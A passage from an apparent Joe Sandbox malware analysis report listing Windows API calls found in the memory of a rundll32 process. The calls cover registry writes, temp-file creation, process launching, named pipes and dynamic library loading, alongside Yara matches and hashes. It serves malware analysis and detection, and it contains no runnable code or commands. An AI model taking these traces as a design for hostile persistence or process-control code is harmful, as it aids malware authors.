                                                          • StrChrA.SHLWAPI(?,0000007C), ref: 062754DF
                                                          • StrTrimA.SHLWAPI(?,06295FCC), ref: 062754F4
                                                          • StrChrA.SHLWAPI(?,0000003D), ref: 062754FD
                                                          • StrTrimA.SHLWAPI(00000001,06295FCC), ref: 06275513
                                                          • _strupr.NTDLL ref: 0627551A
                                                          • StrTrimA.SHLWAPI(?,?), ref: 06275527
                                                          • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 0627556F
                                                          • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 0627558E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Trim$AllocateHeap_struprlstrlenmemcpymemset
                                                          • String ID: $;
                                                          • API String ID: 4019332941-73438061
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • wsprintfA.USER32 ref: 06282DF8
                                                          • OpenWaitableTimerA.KERNEL32(00100000,00000000,00000000), ref: 06282E0C
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000,?), ref: 06282F37
                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                          • memset.NTDLL ref: 06282E38
                                                          • GetLastError.KERNEL32(?,?,00000040,?,?,?,?,?,?,00000000,?), ref: 06282E70
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateCloseErrorHandleHeapLastOpenTimerWaitablememsetwsprintf
                                                          • String ID: 0x%08X$W
                                                          • API String ID: 95801598-2600449260
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • memset.NTDLL ref: 0628C034
                                                            • Part of subcall function 0627AE7C: lstrlen.KERNEL32(0627E448,00000000,00000000,?,?,06287A5B,?,?,?,?,0627E448,?), ref: 0627AE8B
                                                            • Part of subcall function 0627AE7C: mbstowcs.NTDLL ref: 0627AEA7
                                                          • lstrlenW.KERNEL32(00000000,00000000,00000000,773EDBB0,00000020,00000000), ref: 0628C06D
                                                          • wcstombs.NTDLL ref: 0628C077
                                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,773EDBB0,00000020,00000000), ref: 0628C0A8
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0627A645), ref: 0628C0D4
                                                          • TerminateProcess.KERNEL32(?,000003E5), ref: 0628C0EA
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0627A645), ref: 0628C0FE
                                                          • GetLastError.KERNEL32 ref: 0628C102
                                                          • GetExitCodeProcess.KERNEL32(?,00000001), ref: 0628C122
                                                          • CloseHandle.KERNEL32(?), ref: 0628C131
                                                          • CloseHandle.KERNEL32(?), ref: 0628C136
                                                          • GetLastError.KERNEL32 ref: 0628C13A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$CloseErrorHandleLastMultipleObjectsWaitlstrlen$CodeCreateExitTerminatembstowcsmemsetwcstombs
                                                          • String ID: D
                                                          • API String ID: 2463014471-2746444292
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 06274526
                                                          • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 06274545
                                                          • GetLastError.KERNEL32 ref: 062746F6
                                                          • GetLastError.KERNEL32 ref: 06274778
                                                          • SwitchToThread.KERNEL32(?,?,?,?), ref: 062747C1
                                                          • GetLastError.KERNEL32 ref: 06274813
                                                          • GetLastError.KERNEL32 ref: 06274822
                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 06274832
                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 06274843
                                                          • RtlExitUserThread.NTDLL(?), ref: 06274851
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 062748C0
                                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 06274911
                                                          • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000101,?,00000000,?,?,?,00000000,?,00000001), ref: 06274946
                                                          • HeapFree.KERNEL32(00000000,?,?,00000000,?,00000001), ref: 06274956
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorHeapLast$AllocAllocateCriticalFreeSectionThreadVirtual$EnterExitLeaveSwitchUser
                                                          • String ID:
                                                          • API String ID: 2794784202-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • StrChrA.SHLWAPI(?,0000002C,00000000,?,00000000,062885F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001,00000000), ref: 0627C03F
                                                          • StrTrimA.SHLWAPI(00000001,?,?,00000000,062885F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001,00000000,?), ref: 0627C058
                                                          • StrChrA.SHLWAPI(?,0000002C,00000000,?,00000000,062885F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001,00000000), ref: 0627C063
                                                          • StrTrimA.SHLWAPI(00000001,?,?,00000000,062885F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001,00000000,?), ref: 0627C07C
                                                          • lstrlen.KERNEL32(00000000,?,00000001,?,?,00000000,?,00000000,062885F1,?,00000000,0000001E,00000001,00000057,?,?), ref: 0627C11F
                                                          • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 0627C141
                                                          • lstrcpy.KERNEL32(00000020,?), ref: 0627C160
                                                          • lstrlen.KERNEL32(?,?,00000000,062885F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001,00000000,?,00000000), ref: 0627C16A
                                                          • memcpy.NTDLL(?,?,?,?,00000000,062885F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001,00000000), ref: 0627C1AB
                                                          • memcpy.NTDLL(?,?,?,?,?,00000000,062885F1,?,00000000,0000001E,00000001,00000057,?,?,00000000,00000001), ref: 0627C1BE
                                                          • SwitchToThread.KERNEL32(00000057,00000000,?,0000001E,?,?,?,?,?,00000000,062885F1,?,00000000,0000001E,00000001,00000057), ref: 0627C1E2
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,0000001E,?,?,?,?,?,00000000,062885F1,?,00000000,0000001E), ref: 0627C201
                                                          • HeapFree.KERNEL32(00000000,?,?,00000001,?,?,00000000,?,00000000,062885F1,?,00000000,0000001E,00000001,00000057,?), ref: 0627C227
                                                          • HeapFree.KERNEL32(00000000,00000001,?,00000001,?,?,00000000,?,00000000,062885F1,?,00000000,0000001E,00000001,00000057,?), ref: 0627C243
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$Free$Trimlstrlenmemcpy$AllocateSwitchThreadlstrcpy
                                                          • String ID:
                                                          • API String ID: 3323474148-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlen.KERNEL32(?,?,00000000), ref: 062805D3
                                                          • lstrlen.KERNEL32(?,?,00000000), ref: 062805DA
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 062805F1
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 06280602
                                                          • lstrcat.KERNEL32(?,?), ref: 0628061E
                                                          • lstrcat.KERNEL32(?,?), ref: 0628062F
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 06280640
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 062806DD
                                                          • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000,?,00000000), ref: 06280716
                                                          • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 0628072F
                                                          • CloseHandle.KERNEL32(00000000,?,00000000), ref: 06280739
                                                          • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 06280749
                                                          • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 06280762
                                                          • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 06280772
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$AllocateFree$Filelstrcatlstrlen$CloseCreateHandleWritelstrcpy
                                                          • String ID:
                                                          • API String ID: 333890978-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlenW.KERNEL32(?,00000000,?,?,?,0627663D,?,?), ref: 0628AFCF
                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,0627663D,?,?), ref: 0628AFF8
                                                          • lstrcpyW.KERNEL32(-0000FFFE,?), ref: 0628B018
                                                          • lstrcpyW.KERNEL32(-00000002,?), ref: 0628B034
                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,0627663D,?,?), ref: 0628B040
                                                          • LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,?,0627663D,?,?), ref: 0628B043
                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,0627663D,?,?), ref: 0628B04F
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0628B06C
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0628B086
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0628B09C
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0628B0B2
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0628B0C8
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0628B0DE
                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,?,0627663D,?,?), ref: 0628B107
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressProc$CurrentDirectory$Librarylstrcpy$AllocateFreeHeapLoadlstrlen
                                                          • String ID:
                                                          • API String ID: 3772355505-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlenW.KERNEL32(?,?,00000000,?,?,?,06281453,?,?,?), ref: 0627D02D
                                                          • lstrlenW.KERNEL32(?,?,?,00000000,?,?,?,06281453,?,?,?), ref: 0627D038
                                                          • lstrlenW.KERNEL32(?,?,?,00000000,?,?,?,06281453,?,?,?), ref: 0627D040
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 0627D055
                                                          • lstrcpyW.KERNEL32(00000000,?), ref: 0627D066
                                                          • lstrcatW.KERNEL32(00000000,?), ref: 0627D078
                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,06281453,?,?,?), ref: 0627D07D
                                                          • lstrcatW.KERNEL32(00000000,062953E0), ref: 0627D089
                                                          • lstrcatW.KERNEL32(00000000), ref: 0627D092
                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,06281453,?,?,?), ref: 0627D097
                                                          • lstrcatW.KERNEL32(00000000,062953E0), ref: 0627D0A3
                                                          • lstrcatW.KERNEL32(00000000,00000002), ref: 0627D0BF
                                                          • CopyFileW.KERNEL32(?,00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,06281453,?,?,?), ref: 0627D0C7
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,06281453,?,?,?), ref: 0627D0D5
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrcat$lstrlen$CreateDirectoryHeap$AllocateCopyFileFreelstrcpy
                                                          • String ID:
                                                          • API String ID: 3635185113-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 06277A61: RtlAllocateHeap.NTDLL(00000000,00000105,00000000), ref: 06277AA6
                                                            • Part of subcall function 06277A61: RtlAllocateHeap.NTDLL(00000000,00000105), ref: 06277ABE
                                                            • Part of subcall function 06277A61: WaitForSingleObject.KERNEL32(00000000,?,062887CC,?,?), ref: 06277B86
                                                            • Part of subcall function 06277A61: HeapFree.KERNEL32(00000000,?,?,062887CC,?,?), ref: 06277BAF
                                                            • Part of subcall function 06277A61: HeapFree.KERNEL32(00000000,?,?,062887CC,?,?), ref: 06277BBF
                                                            • Part of subcall function 06277A61: RegCloseKey.ADVAPI32(?,?,062887CC,?,?), ref: 06277BC8
                                                          • lstrcmp.KERNEL32(?,00000000), ref: 0628E211
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0627399C,00000000,00000000), ref: 0628E23D
                                                          • GetCurrentThreadId.KERNEL32 ref: 0628E2EE
                                                          • GetCurrentThread.KERNEL32 ref: 0628E2FF
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,Function_00001B71,0627399C,00000001,76CDF730,00000000,00000000), ref: 0628E33C
                                                          • HeapFree.KERNEL32(00000000,?,?,?,00000000,?,Function_00001B71,0627399C,00000001,76CDF730,00000000,00000000), ref: 0628E350
                                                          • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 0628E35E
                                                          • wsprintfA.USER32 ref: 0628E376
                                                            • Part of subcall function 06273263: lstrlen.KERNEL32(?,00000000,06293716,00000000,06282466,?,?,?,06288A07,?,?,?,00000000,00000001,00000000,?), ref: 0627326D
                                                            • Part of subcall function 06273263: lstrcpy.KERNEL32(00000000,?), ref: 06273291
                                                            • Part of subcall function 06273263: StrRChrA.SHLWAPI(?,00000000,0000002E,?,00000003,?,?,06288A07,?,?,?,00000000,00000001,00000000,?,00000000), ref: 06273298
                                                            • Part of subcall function 06273263: lstrcat.KERNEL32(00000000,?), ref: 062732EF
                                                          • lstrlen.KERNEL32(00000000,00000000), ref: 0628E381
                                                          • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 0628E398
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 0628E3A9
                                                          • HeapFree.KERNEL32(00000000,?), ref: 0628E3B5
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$Free$Allocate$CurrentThreadlstrlen$CloseObjectSingleWaitlstrcatlstrcmplstrcpywsprintf
                                                          • String ID:
                                                          • API String ID: 773763258-0
                                                          • Opcode ID: ec89563c7d0d06de7eeb955a14ed0ba95f5e5e4029be05a5651c084e08fda48c
                                                          • Instruction ID: 20a5ddb18638e5442277bd188f8bc1a2b0014d27938dd32d9b82ffc8732319f7
                                                          • Opcode Fuzzy Hash: ec89563c7d0d06de7eeb955a14ed0ba95f5e5e4029be05a5651c084e08fda48c
                                                          • Instruction Fuzzy Hash: 3471247191121AEFDB51EFA5EC88EEEBBB9FF48310F054015EA04A7260D730A945DFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 06275226
                                                          • memcpy.NTDLL(?,?,00000010), ref: 06275249
                                                          • memset.NTDLL ref: 06275295
                                                          • lstrcpyn.KERNEL32(?,?,00000034), ref: 062752A9
                                                          • GetLastError.KERNEL32 ref: 062752D7
                                                          • GetLastError.KERNEL32 ref: 0627531E
                                                          • GetLastError.KERNEL32 ref: 0627533D
                                                          • WaitForSingleObject.KERNEL32(?,000927C0), ref: 06275377
                                                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 06275385
                                                          • GetLastError.KERNEL32 ref: 06275408
                                                          • ReleaseMutex.KERNEL32(?), ref: 0627541A
                                                          • RtlExitUserThread.NTDLL(?), ref: 06275430
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$ObjectSingleWait$ExitMutexReleaseThreadUserlstrcpynmemcpymemset
                                                          • String ID:
                                                          • API String ID: 4037736292-0
                                                          • Opcode ID: fd923aca25d3b7f634b104e82dfcefcff5663e94c59757ab62aeba4352a187e1
                                                          • Instruction ID: 3aa286eeda3e07d4b7dd153d7782a6c6976a7fd21aadde0eefa8a78bc83e8adf
                                                          • Opcode Fuzzy Hash: fd923aca25d3b7f634b104e82dfcefcff5663e94c59757ab62aeba4352a187e1
                                                          • Instruction Fuzzy Hash: CF617D71924701AFD7519F25D848E5BB7E9BFC8720F00891EFA96A2190EBB4E405CF62
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlen.KERNEL32(00000000,76C85520,?,00000000,?,?,?), ref: 0627DA0C
                                                          • lstrlen.KERNEL32(?), ref: 0627DA14
                                                          • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0627DA24
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 0627DA43
                                                          • lstrlen.KERNEL32(?), ref: 0627DA58
                                                          • lstrlen.KERNEL32(?), ref: 0627DA66
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?), ref: 0627DAB4
                                                          • lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,?), ref: 0627DAD8
                                                          • lstrlen.KERNEL32(?), ref: 0627DB0B
                                                          • HeapFree.KERNEL32(00000000,?,?), ref: 0627DB36
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,?), ref: 0627DB4D
                                                          • HeapFree.KERNEL32(00000000,?,?), ref: 0627DB5A
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrlen$Heap$Free$Allocatelstrcpy
                                                          • String ID:
                                                          • API String ID: 904523553-0
                                                          • Opcode ID: 96fb89b0af158f84c6665e55bd5fd3bab262ad23c56ca119e0078a3e740b5093
                                                          • Instruction ID: 9c10774b0d824f131e5bca01b9218b58bd37518272918f5f19f8dc030283c30d
                                                          • Opcode Fuzzy Hash: 96fb89b0af158f84c6665e55bd5fd3bab262ad23c56ca119e0078a3e740b5093
                                                          • Instruction Fuzzy Hash: A941787291024AAFCF528FA4DC44EAE7BBAFF84310F148865FA15A7250D730A951DF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0628201B
                                                          • WaitForSingleObject.KERNEL32(000005A0,00000000), ref: 0628203D
                                                          • ConnectNamedPipe.KERNEL32(?,?), ref: 0628205D
                                                          • GetLastError.KERNEL32 ref: 06282067
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0628208B
                                                          • FlushFileBuffers.KERNEL32(?,?,00000001,00000000,?,?,?,00000010,00000000), ref: 062820CE
                                                          • DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 062820D7
                                                          • WaitForSingleObject.KERNEL32(00000000), ref: 062820E0
                                                          • CloseHandle.KERNEL32(?), ref: 062820F5
                                                          • GetLastError.KERNEL32 ref: 06282102
                                                          • CloseHandle.KERNEL32(?), ref: 0628210F
                                                          • RtlExitUserThread.NTDLL(000000FF), ref: 06282125
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Wait$CloseErrorHandleLastNamedObjectPipeSingle$BuffersConnectCreateDisconnectEventExitFileFlushMultipleObjectsThreadUser
                                                          • String ID:
                                                          • API String ID: 4053378866-0
                                                          • Opcode ID: a937e9931acf7fe4f30c82d29a745cf6924a6954492aaf07ef67263491d58616
                                                          • Instruction ID: daaafbe7be5be71e043476838c6dbb8b0cf4292dcde512b4086f4b976e80d4b7
                                                          • Opcode Fuzzy Hash: a937e9931acf7fe4f30c82d29a745cf6924a6954492aaf07ef67263491d58616
                                                          • Instruction Fuzzy Hash: B731A270516305EFD751AF24DC4895EBBAAFF89314F100A29FA65E20E0D7709A45CFE2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlImageNtHeader.NTDLL(?), ref: 06284151
                                                          • GetTempPathA.KERNEL32(00000000,00000000,?,?,062809CF,00000094,00000000,00000000,?), ref: 06284169
                                                          • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 06284178
                                                          • GetTempPathA.KERNEL32(00000001,00000000,?,?,062809CF,00000094,00000000,00000000,?), ref: 0628418B
                                                          • GetTickCount.KERNEL32 ref: 0628418F
                                                          • wsprintfA.USER32 ref: 062841A6
                                                          • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 062841E1
                                                          • StrRChrA.SHLWAPI(00000000,00000000,?), ref: 06284201
                                                          • lstrlen.KERNEL32(00000000), ref: 0628420B
                                                          • RegSetValueExA.ADVAPI32(00000001,00000001,00000000,00000001,00000000,00000001), ref: 0628421B
                                                          • RegCloseKey.ADVAPI32(?), ref: 06284227
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,?), ref: 06284235
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: HeapPathTemp$AllocateCloseCountCreateFreeHeaderImageTickValuelstrlenwsprintf
                                                          • String ID:
                                                          • API String ID: 3778301466-0
                                                          • Opcode ID: 34ad5de67ed7902346a20da0ef38aa1da965f640bab806039de42afdf07e1677
                                                          • Instruction ID: 54009534aef643de37001d2704d75a5415df1998bcd861067371e55a2a8c03db
                                                          • Opcode Fuzzy Hash: 34ad5de67ed7902346a20da0ef38aa1da965f640bab806039de42afdf07e1677
                                                          • Instruction Fuzzy Hash: EA3167B1901219BFDB01AFA5EC8CDAF7BAEEF89359B044025FA05D7100D6348A55DFB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlImageNtHeader.NTDLL(00000000), ref: 062750BD
                                                          • GetCurrentThreadId.KERNEL32 ref: 062750D3
                                                          • GetCurrentThread.KERNEL32 ref: 062750E4
                                                            • Part of subcall function 0628508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,76C85520,?,?,?,06275112,00000000,?,00000000,00000000,?), ref: 0628509E
                                                            • Part of subcall function 0628508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,06275112,00000000,?,00000000,00000000,?), ref: 062850B7
                                                            • Part of subcall function 0628508C: GetCurrentThreadId.KERNEL32 ref: 062850C4
                                                            • Part of subcall function 0628508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,06275112,00000000,?,00000000,00000000,?), ref: 062850D0
                                                            • Part of subcall function 0628508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,06275112,00000000,?,00000000,00000000,?), ref: 062850DE
                                                            • Part of subcall function 0628508C: lstrcpy.KERNEL32(00000000), ref: 06285100
                                                            • Part of subcall function 06290551: lstrlen.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,00000000,76C85520,00000000,?,0627512E,00000020,00000000,?,00000000), ref: 062905BC
                                                            • Part of subcall function 06290551: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000001,00000000,00000000,76C85520,00000000,?,0627512E,00000020,00000000,?,00000000), ref: 062905E4
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,00000020,00000000,?,00000000,?,00000000,00000000,?), ref: 0627515E
                                                          • HeapFree.KERNEL32(00000000,?,00000020,00000000,?,00000000,?,00000000,00000000,?), ref: 0627516A
                                                          • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 062751B9
                                                          • wsprintfA.USER32 ref: 062751D1
                                                          • lstrlen.KERNEL32(00000000,00000000), ref: 062751DC
                                                          • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 062751F3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$Free$CurrentTempThread$FilePathTimelstrlen$AllocateHeaderImageNameSystemlstrcpywsprintf
                                                          • String ID: W
                                                          • API String ID: 630447368-655174618
                                                          • Opcode ID: 0d26b2a28b68257f3af5f44f25518cbbc2ca2073f82366057c6c678249c63326
                                                          • Instruction ID: 4f292ee7a59c6d73c23223cb77c90a2897fe00925788fb66bfbb0393de1d409f
                                                          • Opcode Fuzzy Hash: 0d26b2a28b68257f3af5f44f25518cbbc2ca2073f82366057c6c678249c63326
                                                          • Instruction Fuzzy Hash: 1E415B70A11219BFDB529FA1EC48DAEBFBAFF89745B044025FA04A6110DB349654DFB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0628B82F
                                                            • Part of subcall function 0628447B: RegCloseKey.ADVAPI32(?,?), ref: 06284502
                                                          • RegOpenKeyA.ADVAPI32(80000001,06284833,?), ref: 0628B86A
                                                          • lstrcpyW.KERNEL32(-00000002,94E85600), ref: 0628B8CC
                                                          • lstrcatW.KERNEL32(00000000,?), ref: 0628B8E1
                                                          • lstrcpyW.KERNEL32(?), ref: 0628B8FB
                                                          • lstrcatW.KERNEL32(00000000,?), ref: 0628B90A
                                                            • Part of subcall function 0628452B: lstrlenW.KERNEL32(?,?,?,0627E51D,?,?,?,?,00001000,?,?,00001000), ref: 0628453E
                                                            • Part of subcall function 0628452B: lstrlen.KERNEL32(?,?,0627E51D,?,?,?,?,00001000,?,?,00001000), ref: 06284549
                                                            • Part of subcall function 0628452B: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 0628455E
                                                          • RegCloseKey.ADVAPI32(06284833,?,?,06284833), ref: 0628B974
                                                            • Part of subcall function 0627C2AA: lstrlenW.KERNEL32(00000000,00000000,00000000,00000000,?,?,0627171E,?,?,00000000,?), ref: 0627C2B6
                                                            • Part of subcall function 0627C2AA: memcpy.NTDLL(00000000,00000000,00000000,00000002,?,?,0627171E,?,?,00000000,?), ref: 0627C2DE
                                                            • Part of subcall function 0627C2AA: memset.NTDLL ref: 0627C2F0
                                                          • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000,00000000,?,00000000,?,?,?,06284833), ref: 0628B9A9
                                                          • GetLastError.KERNEL32(?,?,06284833), ref: 0628B9B4
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,06284833), ref: 0628B9CA
                                                          • RegCloseKey.ADVAPI32(?,00000000,?,00000000,?,?,?,06284833), ref: 0628B9DC
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
